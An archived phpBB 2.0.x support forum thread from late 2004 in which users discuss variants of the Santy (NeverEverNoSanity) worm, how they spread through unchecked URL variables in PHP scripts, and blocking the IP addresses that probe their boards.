NeverEverNoSanity worm

This is an archive of the phpBB 2.0.x support forum. Support for phpBB2 has now ended.
Forum rules
Following phpBB2's EoL, this forum is now archived for reference purposes only.
Please see the following announcement for more information: viewtopic.php?f=14&t=1385785
Locked
blujay
Registered User
Posts: 11
Joined: Wed Dec 22, 2004 3:24 am

Post by blujay » Sat Dec 25, 2004 9:59 pm

People are claiming on Bugtraq that a new variant of the worm is successfully exploiting phpBB 2.0.11.

http://marc.theaimsgroup.com/?l=bugtraq ... 310128&w=2

CICarScene
Registered User
Posts: 176
Joined: Thu Apr 24, 2003 8:12 am
Contact:

Post by CICarScene » Sun Dec 26, 2004 10:24 am

blujay wrote: People are claiming on Bugtraq that a new variant of the worm is successfully exploiting phpBB 2.0.11.

http://marc.theaimsgroup.com/?l=bugtraq ... 310128&w=2


Interesting that it now installs a bot, any more information on this?

dupa
Registered User
Posts: 1
Joined: Sun Dec 05, 2004 4:34 pm

Post by dupa » Wed Dec 29, 2004 12:49 pm

CICarScene wrote:
blujay wrote:People are claiming on Bugtraq that a new variant of the worm is successfully exploiting phpBB 2.0.11.

http://marc.theaimsgroup.com/?l=bugtraq ... 310128&w=2


Interesting that it now installs a bot, any more information on this?


Is there any solution to that problem available?

Canislupus
Registered User
Posts: 104
Joined: Tue Nov 23, 2004 12:42 pm

Post by Canislupus » Wed Dec 29, 2004 1:21 pm

The latest 2 variants of santy have been mislabelled. They do not exploit anything within phpBB but go for the publicised exploits inherrent in php itself. They are only related to santy in the message they leave etc. They should be relabelled as a different virus as they use a different attack to gain access.

Update to the latest version of php and remove the issue.

blujay
Registered User
Posts: 11
Joined: Wed Dec 22, 2004 3:24 am

Post by blujay » Wed Dec 29, 2004 4:23 pm

If I understand the latest two "Santy" variants, they do not exploit a native PHP vulnerability, but vulnerabilities in PHP scripts created by script authors; namely, unchecked variables passed in URLs, that are used to access files. The worm replaces that variable with a URL to another file, and the file gets downloaded and used instead.

Being vulnerable to that is the responsibility of the script author, and can be avoided by good coding practices.

merlsub
Registered User
Posts: 2
Joined: Sat Jan 03, 2004 2:43 am

Re: NeverEverNoSanity propagation?

Post by merlsub » Tue Jan 04, 2005 10:54 pm

Does anyone know if this worm propagates itself and then launches itself from unassuming hosts? That is, does it install itself on a host and that host is an unwitting perpetrator? Or can I assume that the IP address sending the highlight probe is a willing participant?

The reason I am asking is that I am generating a kill list of IP addresses that have been poking me with this virus. So far, my total list (since Dec 20 when I was hit) is almost 3000 unique IP addresses! I want to block them permanently. While observing this in the last 18 hours, I have gotten more than 30 new unique IP addresses hitting me with this highlight probe.

I've already written a mod that automattically adds the $user_ip to my phpbb_banlist table... so when they hit, I say, thank you for your IP address, here's the door. I am also logging IP addresses to a file so they can be input to a firewall IP address blocker.

Draconian, yes. Necessary?

TIA,
Merlsub

blujay
Registered User
Posts: 11
Joined: Wed Dec 22, 2004 3:24 am

Post by blujay » Wed Jan 05, 2005 12:43 am

You'll be blocking server computers from your server, not end-user computers.

Yes, that's the whole point of a worm: it automatically spreads using the computers it has infected.

Read the URLs posted in this thread to learn how the worm works.

Locked

Return to “2.0.x Support Forum”